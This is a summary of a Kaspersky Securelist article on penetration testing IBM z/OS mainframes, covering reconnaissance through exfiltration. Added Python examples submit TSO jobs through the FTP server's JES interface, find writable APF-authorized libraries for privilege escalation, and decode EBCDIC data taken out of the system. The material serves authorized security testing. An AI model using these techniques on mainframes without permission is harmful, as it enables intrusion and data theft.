Approach to mainframe penetration testing on z/OS
Securelist by Kaspersky – Denis Stepanov, Alexander Korotin
The article gives an in-depth overview of mainframe pentesting, focusing on IBM mainframes running the z/OS operating system with the Resource Access Control Facility (RACF) security package as the external security manager.
It covers the whole pentesting process, from reconnaissance to data exfiltration, and highlights where mainframe systems differ from the environments most testers are used to.
Key points:
1) Reconnaissance: identifying a mainframe through network scanning, service banner analysis, and user enumeration via the Telnet (TN3270) service.
2) Initial access: exploiting weak passwords, default credentials, or brute-forcing passwords.
Executing commands by submitting jobs to the Job Entry Subsystem (JES) through the FTP server's JES interface or Network Job Entry (NJE), through Virtual Telecommunications Access Method (VTAM) applications, or through standard services such as Telnet and SSH.
3) Privilege escalation: abusing RACF misconfigurations such as update access to libraries on the Authorized Program Facility (APF) list, profiles left in WARNING mode, and over-permissive access to resource classes (TSOAUTH, OPERCMDS, FACILITY, SURROGAT).
Exploiting vulnerabilities in UNIX System Services (USS), such as CVE-2012-5951.
4) Collection: Gathering sensitive information from USS files, such as command histories, configuration files for various services (Kerberos, LDAP, IBM HTTP Server, WebSphere), and encrypted credentials.
5) Exfiltration: using standard protocols (FTP, SSH) and their utilities, file transfer from the x3270 terminal emulator, or copying files into HTTP server directories.
Copying datasets into USS files first, so that they can be moved out with the same tools.
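The initial-access step above (executing commands by submitting a job to JES through the FTP server) looks like this in practice. The example below is added here and is not code from the Securelist article or its linked tools; it builds a batch TSO job, submits it with SITE FILETYPE=JES, and pulls the spool output back. The 250 "It is known to JES as ..." reply, the JESINTERFACELEVEL=1 job-name rule and the JES LIST column layout are stated as assumptions in the comments; the host, user and account values are placeholders.

```python
"""Submit a batch TSO command job to z/OS through the FTP server's JES interface.

Added example (not from the article). Assumptions are marked in comments.
"""
import getpass
import io
import re
import sys
import time
from ftplib import FTP

JCL_MAX_COLS = 72  # JCL is read from columns 1-72; 73-80 are sequence numbers

# Assumed reply format: after a JES-mode STOR the z/OS FTP server answers
# "250-It is known to JES as JOB01234" (JOBnnnnn, or Jnnnnnnn on large systems).
JES_JOBID_RE = re.compile(r"known to JES as\s+(J(?:OB)?\d+)")


def build_tso_job(userid, account, commands, jobclass="A", msgclass="X"):
    """Return JCL that runs TSO commands in batch under IKJEFT01.

    The job is named <userid>A: with the FTP server's default JESINTERFACELEVEL=1
    (assumption) a user may only LIST/RETR jobs named after their own user ID
    plus one character. In-stream SYSTSIN lines are held to 72 columns too,
    which is conservative but avoids truncation surprises.
    """
    userid = userid.upper()
    if not (1 <= len(userid) <= 7) or userid[0].isdigit():
        raise ValueError("user ID must be 1-7 characters and not start with a digit")
    jobname = userid + "A"
    lines = [
        f"//{jobname:<8} JOB ({account}),'TSO BATCH',CLASS={jobclass},MSGCLASS={msgclass}",
        "//TSOCMD   EXEC PGM=IKJEFT01",
        "//SYSTSPRT DD SYSOUT=*",
        "//SYSTSIN  DD *",
        *commands,
        "/*",
    ]
    for line in lines:
        if len(line) > JCL_MAX_COLS:
            raise ValueError(f"line exceeds column {JCL_MAX_COLS}: {line!r}")
    return "\n".join(lines) + "\n"


def parse_jobid(reply):
    """Extract the JES job ID from the server's STOR reply."""
    match = JES_JOBID_RE.search(reply)
    if not match:
        raise RuntimeError(f"no JES job ID in reply: {reply!r}")
    return match.group(1)


def submit_job(ftp, jcl):
    """Switch the session to JES mode and submit JCL; returns the JES job ID.

    SITE FILETYPE=JES makes STOR submit the text as a job and LIST/RETR work on
    the spool instead of the catalog. The STOR file name is only a placeholder
    in this mode. storlines() sends TYPE A, so the server converts to EBCDIC.
    """
    ftp.sendcmd("SITE FILETYPE=JES")
    reply = ftp.storlines("STOR JOB.JCL", io.BytesIO(jcl.encode("ascii")))
    return parse_jobid(reply)


def wait_for_output(ftp, jobid, attempts=30, delay=2.0):
    """Poll the JES LIST until the job reaches OUTPUT status, then RETR its spool.

    Assumed LIST row layout: JOBNAME JOBID OWNER STATUS CLASS ...
    """
    for _ in range(attempts):
        rows = []
        ftp.retrlines("LIST", rows.append)
        for row in rows:
            cols = row.split()
            if len(cols) >= 4 and cols[1] == jobid and cols[3] == "OUTPUT":
                spool = []
                ftp.retrlines(f"RETR {jobid}", spool.append)
                return spool
        time.sleep(delay)
    raise TimeoutError(f"job {jobid} did not reach OUTPUT status")


if __name__ == "__main__":
    # usage: python jes_submit.py <host> <userid>   (host/user are placeholders)
    host, user = sys.argv[1], sys.argv[2]
    session = FTP(host)
    session.login(user, getpass.getpass("password: "))
    job_id = submit_job(session, build_tso_job(user, "ACCT", ["LISTUSER"]))
    print("submitted as", job_id)
    print("\n".join(wait_for_output(session, job_id)))
    session.quit()
```

The column check matters more than it looks: a JCL statement that spills past column 72 is silently truncated, and the job fails with a JCL error that only shows up on the spool. Running the same job through NJE or a TSO SUBMIT needs the same JCL; only the delivery path changes.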
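For the privilege-escalation step, the question a tester actually has to answer is "which APF-authorized library can my user write to, and why". The check below is an added example, not the article's own tooling: it parses the dataset names out of a DISPLAY PROG,APF response and applies RACF's access-list precedence (user entry, then the highest group entry, then UACC) plus the WARNING-mode override. The CSV450I display layout is assumed, the profile data are expressed as dicts rather than parsed from LISTDSD output, generic profile matching is not modelled, and all sample data are constructed.

```python
"""Flag APF-authorized libraries a user could modify, from RACF profile data.

Added example (not from the article). Layouts and samples are assumed/constructed.
"""

# RACF dataset access levels in increasing order of privilege.
ACCESS_LEVELS = ["NONE", "EXECUTE", "READ", "UPDATE", "CONTROL", "ALTER"]


def level(access):
    return ACCESS_LEVELS.index(access.upper())


def parse_apf_list(text):
    """Return dataset names from a DISPLAY PROG,APF response.

    Assumed layout: after the 'ENTRY VOLUME DSNAME' header each row is
    '<n> <volser> <dsname>'. Lines before the header are ignored.
    """
    names, in_table = [], False
    for line in text.splitlines():
        parts = line.split()
        if parts[:3] == ["ENTRY", "VOLUME", "DSNAME"]:
            in_table = True
            continue
        if in_table and len(parts) == 3 and parts[0].isdigit():
            names.append(parts[2].upper())
    return names


def effective_access(profile, user, groups=()):
    """RACF precedence for a discrete profile: a user entry in the access list
    wins; otherwise the highest access held by any of the user's groups;
    otherwise UACC."""
    acl = {k.upper(): v.upper() for k, v in profile.get("access_list", {}).items()}
    user = user.upper()
    if user in acl:
        return acl[user]
    via_groups = [acl[g.upper()] for g in groups if g.upper() in acl]
    if via_groups:
        return max(via_groups, key=level)
    return profile.get("uacc", "NONE").upper()


def can_modify(profile, user, groups=()):
    """UPDATE or higher lets the user replace members. A profile in WARNING
    mode grants every request (RACF only logs a warning), so it counts as
    writable whatever the access level says."""
    if profile.get("warning", False):
        return True
    return level(effective_access(profile, user, groups)) >= level("UPDATE")


def writable_apf_libraries(apf_text, profiles, user, groups=()):
    """Return (dataset, reason) for every APF library the user could modify."""
    by_name = {p["dataset"].upper(): p for p in profiles}
    findings = []
    for dsn in parse_apf_list(apf_text):
        prof = by_name.get(dsn)
        if prof is None:
            # No profile data supplied: check manually. A dataset with no covering
            # profile is unprotected unless SETROPTS PROTECTALL is active.
            findings.append((dsn, "no profile supplied"))
        elif can_modify(prof, user, groups):
            reason = "WARNING mode" if prof.get("warning") else (
                f"{effective_access(prof, user, groups)} access")
            findings.append((dsn, reason))
    return findings


# Constructed samples, not captured from a real system.
SAMPLE_APF_DISPLAY = """\
CSV450I 10.21.46 PROG,APF DISPLAY 123
FORMAT=DYNAMIC
ENTRY VOLUME DSNAME
   1 SYSRES SYS1.LINKLIB
   2 SYSRES SYS1.SVCLIB
   3 USR001 PROD.APF.LOADLIB
   4 USR001 TEST.APF.LOADLIB
"""
SAMPLE_PROFILES = [
    {"dataset": "SYS1.LINKLIB", "uacc": "READ", "warning": False,
     "access_list": {"SYS1": "ALTER"}},
    {"dataset": "SYS1.SVCLIB", "uacc": "NONE", "warning": False, "access_list": {}},
    {"dataset": "PROD.APF.LOADLIB", "uacc": "NONE", "warning": True,
     "access_list": {"PRODADM": "ALTER"}},
    {"dataset": "TEST.APF.LOADLIB", "uacc": "READ", "warning": False,
     "access_list": {"DEVTEAM": "UPDATE"}},
]

if __name__ == "__main__":
    for dsn, why in writable_apf_libraries(SAMPLE_APF_DISPLAY, SAMPLE_PROFILES,
                                           "PENTEST", groups=["DEVTEAM"]):
        print(f"{dsn:<24} {why}")
```

Any hit here is a path to supervisor state: a load module placed in an APF-authorized library runs with AC(1) when invoked from an authorized environment. The WARNING-mode finding is the one that gets overlooked, because LISTDSD shows the access list as restrictive while every request still succeeds.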
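Two of the steps above run into the same mainframe-specific problem: EBCDIC. During reconnaissance a captured TN3270 screen or banner has to be recognised as EBCDIC rather than garbage, and during exfiltration a dataset pulled over FTP in binary mode arrives as concatenated fixed-length records with no line breaks. The example below is added here and is not from the article; it uses Python's cp037 codec as a stand-in for z/OS's usual IBM-1047 (an assumption stated in the code), and all banners, screens and records are constructed.

```python
"""Recognise EBCDIC in captured data and unpack dataset images pulled off z/OS.

Added example (not from the article). Samples are constructed.
"""
import string

# Assumption: cp037 (EBCDIC US/Canada, shipped with Python) is close enough to
# the IBM-1047 z/OS normally uses. The two differ in a few symbols (square
# brackets among them); use iconv -f IBM-1047 on the box when punctuation matters.
EBCDIC_CODEC = "cp037"
PRINTABLE = set(string.printable)


def printable_ratio(text):
    return sum(ch in PRINTABLE for ch in text) / len(text) if text else 0.0


def guess_encoding(data):
    """Decode both ways and keep the reading with more printable characters.

    ASCII letters land on accented or control code points when read as EBCDIC,
    and EBCDIC letters (0x81-0xA9, 0xC1-0xE9) are not ASCII at all, so the two
    readings separate cleanly on real text. Returns (kind, decoded_text).
    """
    as_ascii = data.decode("ascii", errors="replace")
    as_ebcdic = data.decode(EBCDIC_CODEC, errors="replace")
    if printable_ratio(as_ebcdic) > printable_ratio(as_ascii):
        return "ebcdic", as_ebcdic
    return "ascii", as_ascii


def decode_uss_text(data, codec=EBCDIC_CODEC):
    """A USS text file copied out in binary mode is EBCDIC with NL (0x15) line
    ends; cp037 maps 0x15 to U+0085, which str.splitlines() treats as a break."""
    return data.decode(codec).splitlines()


def unpack_fb_records(data, lrecl=80, codec=EBCDIC_CODEC):
    """A fixed-block dataset transferred in binary mode has no line separators:
    records are concatenated, each blank-padded to LRECL (80 for JCL/source)."""
    if len(data) % lrecl:
        raise ValueError(f"{len(data)} bytes is not a multiple of LRECL {lrecl}")
    return [data[i:i + lrecl].decode(codec).rstrip()
            for i in range(0, len(data), lrecl)]


def make_fb_image(lines, lrecl=80, codec=EBCDIC_CODEC):
    """Constructed helper: the byte image an FB dataset holding `lines` gives."""
    out = bytearray()
    for line in lines:
        if len(line) > lrecl:
            raise ValueError(f"record longer than LRECL {lrecl}: {line!r}")
        out += line.ljust(lrecl).encode(codec)
    return bytes(out)


# Constructed samples, not captured from a real system.
SAMPLE_ASCII_BANNER = b"220-FTPD1 IBM FTP CS V2R4 at MVS1, 10:21:46 on 2024-01-01.\r\n"
SAMPLE_EBCDIC_SCREEN = "*** WELCOME TO TSO/E *** ENTER USERID:".encode(EBCDIC_CODEC)
SAMPLE_JCL_LINES = [
    "//PENTSTA  JOB (ACCT),'TSO BATCH',CLASS=A,MSGCLASS=X",
    "//TSOCMD   EXEC PGM=IKJEFT01",
    "//SYSTSPRT DD SYSOUT=*",
    "//SYSTSIN  DD *",
    "LISTUSER",
    "/*",
]
SAMPLE_FB_IMAGE = make_fb_image(SAMPLE_JCL_LINES)
SAMPLE_USS_HISTORY = "cd /etc\x85ls -la\x85".encode(EBCDIC_CODEC)

if __name__ == "__main__":
    for blob in (SAMPLE_ASCII_BANNER, SAMPLE_EBCDIC_SCREEN):
        kind, text = guess_encoding(blob)
        print(f"{kind:<7} {text.strip()}")
    print(unpack_fb_records(SAMPLE_FB_IMAGE))
    print(decode_uss_text(SAMPLE_USS_HISTORY))
```

Transferring in text mode (TYPE A) lets the z/OS FTP server do the conversion and insert line ends for you, which is simpler; binary mode plus the unpacking above is for the cases where you need the exact bytes, such as load modules or files whose record length you want to preserve. The same record logic applies to output copied into a USS file and pulled over SSH.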
The article emphasizes the importance of understanding mainframe-specific concepts, such as dataset types, resource classes, and the EBCDIC character encoding.
It also links to tools and scripts that help at each stage of the pentest.
The authors conclude by noting that the techniques and procedures discussed are not exhaustive and encourage readers to contribute to this relatively niche field of mainframe pentesting.
The article serves as a starting point for those interested in exploring the security of these complex systems.
Link: https://securelist.com/zos-mainframe-pentesting/113427/